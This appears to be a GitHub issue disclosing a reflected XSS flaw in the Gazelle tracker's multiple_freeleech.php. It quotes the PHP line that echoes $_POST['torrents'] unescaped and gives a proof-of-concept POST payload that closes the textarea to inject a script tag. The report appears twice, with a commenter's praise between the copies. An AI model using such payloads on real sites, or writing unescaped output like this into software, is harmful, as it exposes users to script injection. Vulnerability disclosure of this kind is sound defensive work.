Open xjzzzxx opened 1 month ago
Hello,
I would like to report for a XSS vulnerability in gazelle commit 63b3370
In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/multiple_freeleech.php
... <textarea name="torrents" style="width: 95%; height: 200px;"><?=$_POST['torrents']?></textarea><br /><br /> // Line 96 ...
Source from $_POST['torrents'] without any filtering or checking which resulting in XSS.
$_POST['torrents']
POST /sections/tools/managers/multiple_freeleech.php
With the Data
torrents=</textarea>%3Cscript%3Ealert(1);%3C/script%3E<textarea>
BTW,cms.gazelle.com in local(changes hosts)
Same as my comment submitted two instances ago; as an old timer who began in gazelle, codeigniter and laravel I applaud your analysis and disclosure.
Hello,
I would like to report for a XSS vulnerability in gazelle commit 63b3370
In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/multiple_freeleech.php
Source from
$_POST['torrents']
without any filtering or checking which resulting in XSS.Poc
POST /sections/tools/managers/multiple_freeleech.php
With the Data
torrents=</textarea>%3Cscript%3Ealert(1);%3C/script%3E<textarea>
Manual verification
BTW,cms.gazelle.com in local(changes hosts)